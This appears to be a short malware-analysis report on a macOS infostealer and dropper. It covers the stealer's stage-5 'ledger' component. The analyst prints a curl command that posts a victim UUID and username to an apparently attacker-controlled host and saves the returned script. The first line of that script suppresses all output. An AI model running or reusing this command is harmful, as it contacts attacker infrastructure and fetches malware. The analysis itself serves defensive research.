← Reports

InfoStealer · Dropper

Essential macOS Stealer - script.sh

Author
Moise Medici
Updated
10 Sept 2026 · Completed
Difficulty
Easy
Platform
MacOS
Capabilities
Command and Control C2 CommunicationCommand Execution via Powershell Cmd BashCredential TheftData-ExfiltrationDropping Secondary Payloads
Tags
bashAppleScriptEssential macOS Stealer

Stage5 ledger Code Analysis

Looking at the ledger component selector, the following cURL is used:

Terminal window
curl --max-time 100 --retry 3 --retry-delay 2 -X POST 'https://d9mjs.sbs/' -d 'uuid=AAA1111A-1A11-11AA-A111-0A1A1A11AA11>&username=aldo&txid=7dc957c3cfcbf7bb79ff3b8f0f8288a9&ledger' > public/samples/new/stage5_ledger.sh

Its content is:

stage5_ledger.sh
#!/bin/bash
exec >/dev/null 2>&1

After this line runs, any command that would normally print to the terminal, including normal output and error messages, is discarded.